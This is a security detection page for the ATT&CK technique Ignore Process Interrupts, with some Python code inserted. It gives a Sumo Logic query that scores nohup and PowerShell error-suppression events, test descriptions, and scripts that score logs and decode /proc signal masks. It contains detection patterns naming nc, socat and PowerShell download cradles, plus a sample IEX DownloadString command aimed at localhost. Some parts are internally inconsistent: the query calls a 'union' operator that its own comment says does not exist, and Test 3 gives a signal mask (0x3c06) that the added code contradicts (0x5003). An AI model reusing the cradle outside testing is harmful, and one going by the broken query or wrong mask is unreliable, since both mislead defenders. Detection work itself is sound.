T1564.011 Sumo Logic CSE · Sumo

Detect Ignore Process Interrupts in Sumo Logic CSE

Adversaries evade defensive mechanisms by launching processes immune to interrupt signals, preventing analyst-driven or system-triggered termination. The primary technique is nohup on Linux and macOS, which detaches a process from the controlling terminal and causes it to ignore SIGHUP—the hangup signal sent when a session ends or a terminal closes. Malware authors also call signal() or sigaction() directly to mask SIGINT, SIGTERM, SIGPIPE, SIGCHLD, and other control signals, as documented in BPFDoor (masks 7 signals) and BOLDMOVE (masks SIGCHLD, SIGHUP, SIGPIPE). On Windows, PowerShell's -ErrorAction SilentlyContinue or $ErrorActionPreference = 'SilentlyContinue' prevents script termination on errors, allowing malicious payloads to continue past failures that would otherwise halt execution. Real-world usage includes GoldMax Linux variant (nohup invocation for C2 persistence through SSH disconnection), UNC3886 (nohup /bin/support in /etc/init.d/localnet for semi-persistence across reboots), Sea Turtle running SnappyTCP via nohup, and OSX/Shlayer applying nohup to payload execution on macOS. Unlike Trap (T1546.005), this technique does not re-invoke the process after termination—it only prolongs the existing execution session through events that would otherwise end it.

MITRE ATT&CK

Tactic: Defense Evasion
Technique: T1564 Hide Artifacts
Sub-technique: T1564.011 Ignore Process Interrupts
Canonical reference: https://attack.mitre.org/techniques/T1564/011/

Sumo Detection Query

Sumo Logic CSE (Sumo)
// T1564.011 - Ignore Process Interrupts: nohup + PowerShell Error Suppression
// Part 1: Linux/macOS nohup detection via auditd or syslog
(
  (_sourceCategory=linux/audit OR _sourceCategory=linux/syslog OR _sourceCategory=macos/syslog)
  ("nohup" OR "EXECVE")
  // Exclude known-good cron/scheduler invocations
  NOT (process="cron" OR process="anacron" OR process="CRON" OR _raw matches /crond.+nohup/)
  | parse regex field=_raw "(?:a0|cmd|command|comm)=\"?(?<exec_cmd>[^\"\s]+)" nodrop
  | parse regex field=_raw "nohup\s+(?<nohup_target>\S+)(?<nohup_args>.*)" nodrop
  | where exec_cmd = "nohup" OR nohup_target != ""
  | "nohup_interrupt_ignore" as detection_type
  | "Linux/macOS" as platform
  | if(nohup_target matches /^\/(tmp|var\/tmp|dev\/shm)\/.*/, 1, 0) as temp_dir_payload
  // Match the tool by basename so a bare "nc" (as in Test 1) counts, not only /bin/nc
  | if(nohup_target matches /(.*\/)?(nc|ncat|netcat|socat)/, 1, 0) as suspicious_net_tool
  | if(nohup_args matches /(.*\s)?-i(\s.*)?/, 1, 0) as interactive_shell
  | if(nohup_target matches /.*\/etc\/(init\.d\/|rc\.|cron).*/, 1, 0) as persistence_path
  // A trailing "&" survives only in shell-history or syslog lines; auditd EXECVE records never carry it
  | if(_raw matches /.*&\s*/, 1, 0) as background_exec
  | temp_dir_payload + suspicious_net_tool + interactive_shell + persistence_path + background_exec as suspicion_score
  | fields _time, _sourceHost, exec_cmd, nohup_target, nohup_args, detection_type, platform, suspicion_score
)
// Part 2: Windows PowerShell error suppression with malicious indicators
// Sumo search has no union operator: schedule Part 1 and Part 2 as separate searches
| union
(
  (_sourceCategory=windows/sysmon OR _sourceCategory=windows/security)
  ("powershell.exe" OR "pwsh.exe")
  ("SilentlyContinue" OR "ErrorActionPreference" OR "-ErrorAction Ignore" OR "-EA Ignore")
  | parse regex field=_raw "(?i)(?:CommandLine|cmd)\s*=\s*\"?(?<command_line>[^\"\n]+)" nodrop
  | parse regex field=_raw "(?i)(?:Image|process)\s*=\s*\"?(?<process_image>[^\"\n]+)" nodrop
  | where process_image matches /(?i).*(powershell\.exe|pwsh\.exe)/
  | toLowerCase(command_line) as cmd_lower
  | if(cmd_lower matches /.*(invoke-webrequest|iwr\s|net\.webclient|downloadstring|downloadfile).*/, 1, 0) as has_download_cradle
  | if(cmd_lower matches /.*(invoke-expression|iex\(|iex\s|-encodedcommand|-enc\s).*/, 1, 0) as has_exec_cradle
  | if(cmd_lower matches /.*(schtasks|sc\s+create|reg\s+add|new-service).*/, 1, 0) as has_persistence
  | if(cmd_lower matches /.*(set-mppreference|add-mppreference|disablerealtimemonitoring).*/, 1, 0) as has_defense_evasion
  | if(cmd_lower matches /.*(certutil|start-bitstransfer|bitsadmin).*/, 1, 0) as has_network_util
  | has_download_cradle + has_exec_cradle + has_persistence + has_defense_evasion + has_network_util as suspicion_score
  | where suspicion_score > 0
  | "ps_error_suppression" as detection_type
  | "Windows" as platform
  | "" as nohup_target
  | process_image as exec_cmd
  | command_line as nohup_args
  | fields _time, _sourceHost, exec_cmd, nohup_target, nohup_args, detection_type, platform, suspicion_score
)
// Tuning knob: raise this threshold once the benign nohup baseline for the estate is known
| where suspicion_score >= 0
| sort by _time desc
| fields _time, _sourceHost, exec_cmd, nohup_target, nohup_args, detection_type, platform, suspicion_score
Severity: high. Confidence: medium.

Detects T1564.011 Ignore Process Interrupts across Linux/macOS and Windows. On Linux/macOS, identifies nohup invocations via auditd and syslog with suspicion scoring based on payload location, network tools, interactive shells, and persistence paths. On Windows, identifies PowerShell error suppression flags combined with malicious behavioral indicators including download cradles, encoded command execution, persistence actions, and defense evasion.
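As an added illustration (not part of the page's Sumo content and not the vendor's code), the following Python reimplements the query's suspicion scoring over constructed auditd, syslog and Sysmon-style records, so the indicators can be checked offline before the search is scheduled. The sample records, the key=value flattening of the Sysmon fields, and the helper names are assumptions; the network-tool indicator matches the tool by basename so a bare nc, as in Test 1, counts.

```python
"""Offline re-implementation of the nohup / PowerShell error-suppression scoring."""
import re
from typing import Dict, List, Optional

Record = Dict[str, object]

# Constructed sample records (not real telemetry). The first four imitate auditd EXECVE
# records, the fifth a syslog-style shell line, and the Windows ones Sysmon process-create
# events flattened to key="value" form as the query's parse regex expects.
SAMPLE_LINUX = [
    'type=EXECVE msg=audit(1700000000.101:201): argc=2 a0="nohup" a1="/tmp/update.sh"',
    'type=EXECVE msg=audit(1700000000.102:202): argc=4 a0="nohup" a1="nc" a2="-lvp" a3="14444"',
    'type=EXECVE msg=audit(1700000000.103:203): argc=2 a0="nohup" a1="/opt/app/bin/migrate"',
    'type=EXECVE msg=audit(1700000000.104:204): argc=2 a0="ls" a1="-la"',
    'Nov 14 10:00:00 host1 sh[4242]: nohup /etc/init.d/localnet &',
]
SAMPLE_WINDOWS = [
    "Image=\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" "
    "CommandLine=\"powershell.exe -ErrorAction SilentlyContinue -c "
    "IEX((New-Object Net.WebClient).DownloadString('http://127.0.0.1:19999/a'))\"",
    "Image=\"C:\\Program Files\\PowerShell\\7\\pwsh.exe\" "
    "CommandLine=\"pwsh.exe -c Get-Service foo -ErrorAction SilentlyContinue\"",
    "Image=\"C:\\Windows\\System32\\cmd.exe\" CommandLine=\"cmd.exe /c iex -ErrorAction SilentlyContinue\"",
]

ARGV_RE = re.compile(r'\ba(\d+)="([^"]*)"')          # a0="..." a1="..." of an EXECVE record
NOHUP_RE = re.compile(r"nohup\s+(\S+)(.*)")           # fallback for free-text lines
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
NET_TOOL_RE = re.compile(r"(^|/)(nc|ncat|netcat|socat)$")   # basename match
PERSIST_RE = re.compile(r"/etc/(init\.d/|rc\.|cron)")
KV_RE = re.compile(r'(?i)\b(Image|CommandLine)="([^"]*)"')
SUPPRESS_RE = re.compile(r"(?i)silentlycontinue|erroractionpreference|-erroraction\s+ignore|-ea\s+ignore")
PS_INDICATORS = {
    "has_download_cradle": r"invoke-webrequest|iwr\s|net\.webclient|downloadstring|downloadfile",
    "has_exec_cradle": r"invoke-expression|iex\(|iex\s|-encodedcommand|-enc\s",
    "has_persistence": r"schtasks|sc\s+create|reg\s+add|new-service",
    "has_defense_evasion": r"set-mppreference|add-mppreference|disablerealtimemonitoring",
    "has_network_util": r"certutil|start-bitstransfer|bitsadmin",
}


def score_linux(raw: str) -> Optional[Record]:
    """Part 1: return the nohup fields and score for one line, or None when nohup is absent."""
    argv = [v for _, v in sorted((int(i), v) for i, v in ARGV_RE.findall(raw))]
    if argv and argv[0] == "nohup":
        target, args = (argv[1] if len(argv) > 1 else ""), " ".join(argv[2:])
    else:
        m = NOHUP_RE.search(raw)
        if not m:
            return None
        target, args = m.group(1), m.group(2).strip()
    flags = {
        "temp_dir_payload": int(target.startswith(TEMP_DIRS)),
        "suspicious_net_tool": int(bool(NET_TOOL_RE.search(target))),
        "interactive_shell": int(bool(re.search(r"(^|\s)-i\b", args))),
        "persistence_path": int(bool(PERSIST_RE.search(target))),
        # The shell consumes "&", so auditd argv never carries it; only free-text lines can fire this.
        "background_exec": int(raw.rstrip().endswith("&")),
    }
    return {"exec_cmd": "nohup", "nohup_target": target, "nohup_args": args,
            "detection_type": "nohup_interrupt_ignore", "platform": "Linux/macOS",
            "suspicion_score": sum(flags.values()), **flags}


def score_windows(raw: str) -> Optional[Record]:
    """Part 2: PowerShell with an error-suppression marker plus at least one behavioural indicator."""
    kv = {k.lower(): v for k, v in KV_RE.findall(raw)}
    image, cmd = kv.get("image", ""), kv.get("commandline", "")
    if not re.search(r"(?i)(powershell|pwsh)\.exe$", image) or not SUPPRESS_RE.search(cmd):
        return None
    cmd_lower = cmd.lower()
    flags = {name: int(bool(re.search(pat, cmd_lower))) for name, pat in PS_INDICATORS.items()}
    score = sum(flags.values())
    if score == 0:          # mirrors the query's "where suspicion_score > 0" for Windows
        return None
    return {"exec_cmd": image, "nohup_target": "", "nohup_args": cmd,
            "detection_type": "ps_error_suppression", "platform": "Windows",
            "suspicion_score": score, **flags}


def run_detection(linux_lines: List[str], windows_lines: List[str]) -> List[Record]:
    """Combine both parts and order by score, highest first (the query orders by time)."""
    hits = [h for line in linux_lines if (h := score_linux(line))]
    hits += [h for line in windows_lines if (h := score_windows(line))]
    return sorted(hits, key=lambda h: h["suspicion_score"], reverse=True)


if __name__ == "__main__":
    for hit in run_detection(SAMPLE_LINUX, SAMPLE_WINDOWS):
        print(hit["platform"], hit["suspicion_score"], hit["exec_cmd"], hit["nohup_target"], hit["nohup_args"])
```

The legitimate `Get-Service ... -ErrorAction SilentlyContinue` record drops out because it has no behavioural indicator, which is exactly the tuning the query relies on for the automation tooling listed under False Positives.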

Data Sources

  • Linux auditd (via Sumo Logic installed collector)
  • Linux/macOS syslog
  • Windows Sysmon (via Sumo Logic installed collector)
  • Windows Security Event log

Required Tables

  • _sourceCategory=linux/audit
  • _sourceCategory=linux/syslog
  • _sourceCategory=macos/syslog
  • _sourceCategory=windows/sysmon
  • _sourceCategory=windows/security

False Positives & Tuning

  • System administrators and DevOps engineers using nohup to launch long-running background processes (database migrations, backups, build jobs) that must survive terminal disconnects
  • Legitimate monitoring agents and daemon startup scripts in /etc/init.d or /etc/rc.d that invoke nohup to ensure process resilience
  • Infrastructure automation tooling (Ansible, Chef, Puppet) using PowerShell with -ErrorAction SilentlyContinue when idempotently checking or creating system resources

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: nohup Background Execution with Network Listener

    Expected signal: Linux auditd EXECVE record: a0='nohup', a1='nc', a2='-lvp', a3='14444', a4='-s', a5='127.0.0.1'. A second EXECVE record for the nc process itself with ppid matching the nohup process. MDE DeviceProcessEvents: FileName='nohup' with child process FileName='nc' where InitiatingProcessFileName='nohup'. DeviceNetworkEvents: nc process creating a listening socket on port 14444.

  2. Test 2: nohup Protecting Interpreter from Temp Directory

    Expected signal: Auditd EXECVE: a0='chmod', a1='+x', a2='/tmp/df00tech_test_payload.sh' followed by a0='nohup', a1='/tmp/df00tech_test_payload.sh'. MDE DeviceFileEvents: file creation at /tmp/df00tech_test_payload.sh. DeviceProcessEvents: FileName='nohup', ProcessCommandLine contains '/tmp/' (TempDirPayload indicator). A second DeviceProcessEvents record for bash/sh with InitiatingProcessFileName='nohup' and FolderPath='/tmp/'.

  3. Test 3: Programmatic Signal Masking via Python

    Expected signal: Auditd EXECVE: a0='python3', a1='-c', a2 contains 'signal.SIG_IGN'. MDE DeviceProcessEvents: FileName='python3', ProcessCommandLine contains 'SIG_IGN' and 'signal'. /proc/<pid>/status SigIgn field will be non-zero (e.g., 0x0000000000003c06 with SIGHUP=1, SIGINT=2, SIGTERM=15, SIGPIPE=13 masked). Attempting `kill -SIGTERM <pid>` will have no effect; only `kill -9 <pid>` terminates the process.

  4. Test 4: PowerShell Error Suppression with Download Cradle

    Expected signal: Sysmon Event ID 1: Process Create — Image=powershell.exe, CommandLine contains 'ErrorActionPreference' and 'SilentlyContinue' and 'Net.WebClient' and 'DownloadString' and 'Invoke-WebRequest'. Sysmon Event ID 3: Network Connection attempts to 127.0.0.1:19999 (will fail with connection refused). PowerShell ScriptBlock Log Event ID 4104 in Microsoft-Windows-PowerShell/Operational with full script content.
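To make the SigIgn field from Test 3 concrete, here is an added Python decoder (not from the page or the vendor) that turns the hex mask in /proc/<pid>/status into signal names. Bit n-1 of the mask stands for signal number n, so SIGHUP (1), SIGINT (2), SIGPIPE (13) and SIGTERM (15) together give 0x5003; a process started under nohup shows at least bit 0 set, because the ignored SIGHUP disposition is inherited across exec. The status excerpt is constructed, the numbers are the Linux x86-64 signal numbers, and scan_proc only walks a live /proc when one exists.

```python
"""Decode SigIgn/SigBlk/SigCgt masks from /proc/<pid>/status and flag kill-resistant processes."""
import os
from typing import Dict, Iterable, List

# Linux x86-64 signal numbers (real-time signals 34-64 are reported as SIG<n>).
LINUX_SIGNALS = {1: "SIGHUP", 2: "SIGINT", 3: "SIGQUIT", 4: "SIGILL", 5: "SIGTRAP", 6: "SIGABRT",
                 7: "SIGBUS", 8: "SIGFPE", 9: "SIGKILL", 10: "SIGUSR1", 11: "SIGSEGV", 12: "SIGUSR2",
                 13: "SIGPIPE", 14: "SIGALRM", 15: "SIGTERM", 17: "SIGCHLD", 18: "SIGCONT",
                 19: "SIGSTOP", 20: "SIGTSTP", 21: "SIGTTIN", 22: "SIGTTOU"}
# Control signals whose ignoring is the behaviour this detection is about.
WATCHED = ("SIGHUP", "SIGINT", "SIGQUIT", "SIGPIPE", "SIGTERM", "SIGCHLD")

# Constructed /proc/<pid>/status excerpt: a process ignoring SIGHUP, SIGINT, SIGPIPE, SIGTERM.
SAMPLE_STATUS = """Name:\tpayload
Pid:\t4242
SigPnd:\t0000000000000000
SigBlk:\t0000000000000000
SigIgn:\t0000000000005003
SigCgt:\t0000000000000000
"""


def parse_status_masks(text: str) -> Dict[str, int]:
    """Pull the four signal-mask fields out of a status file as integers."""
    masks: Dict[str, int] = {}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key in ("SigPnd", "SigBlk", "SigIgn", "SigCgt"):
            masks[key] = int(value.strip(), 16)
    return masks


def decode_mask(mask: int) -> List[str]:
    """Bit n-1 set means signal n is in the set."""
    return [LINUX_SIGNALS.get(n, f"SIG{n}") for n in range(1, 65) if (mask >> (n - 1)) & 1]


def encode_mask(names: Iterable[str]) -> int:
    """Inverse of decode_mask for the named signals, e.g. to build a comparison value."""
    by_name = {v: k for k, v in LINUX_SIGNALS.items()}
    mask = 0
    for name in names:
        mask |= 1 << (by_name[name] - 1)
    return mask


def assess(text: str) -> Dict[str, object]:
    """Summarise what a status file says about interrupt handling."""
    ignored = decode_mask(parse_status_masks(text).get("SigIgn", 0))
    return {
        "ignored": ignored,
        "ignored_control_signals": [s for s in WATCHED if s in ignored],
        # Ignoring HUP, INT and TERM survives logout, Ctrl-C and a plain kill; only SIGKILL stops it.
        "only_sigkill_works": all(s in ignored for s in ("SIGHUP", "SIGINT", "SIGTERM")),
        # SIGKILL and SIGSTOP can never be ignored, so a set bit here means the value is bogus.
        "impossible_bits": [s for s in ("SIGKILL", "SIGSTOP") if s in ignored],
    }


def scan_proc(proc_root: str = "/proc") -> List[Dict[str, object]]:
    """On a Linux host, list live processes that ignore any watched control signal."""
    findings: List[Dict[str, object]] = []
    if not os.path.isdir(proc_root):
        return findings
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, pid, "status")) as fh:
                text = fh.read()
        except OSError:          # process exited or is not readable
            continue
        result = assess(text)
        if result["ignored_control_signals"]:
            name = next((l.split(":", 1)[1].strip() for l in text.splitlines() if l.startswith("Name:")), "?")
            findings.append({"pid": int(pid), "name": name, **result})
    return findings


if __name__ == "__main__":
    print(assess(SAMPLE_STATUS))
    for f in scan_proc():
        print(f["pid"], f["name"], f["ignored_control_signals"])
```

Run on a live host, scan_proc gives the same answer as the Test 3 check without sending any signal: a process whose status reports only_sigkill_works is the one `kill -SIGTERM` will not stop.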

Unlock Pro Content

Get the full detection package for T1564.011 including response playbook, investigation guide, and atomic red team tests.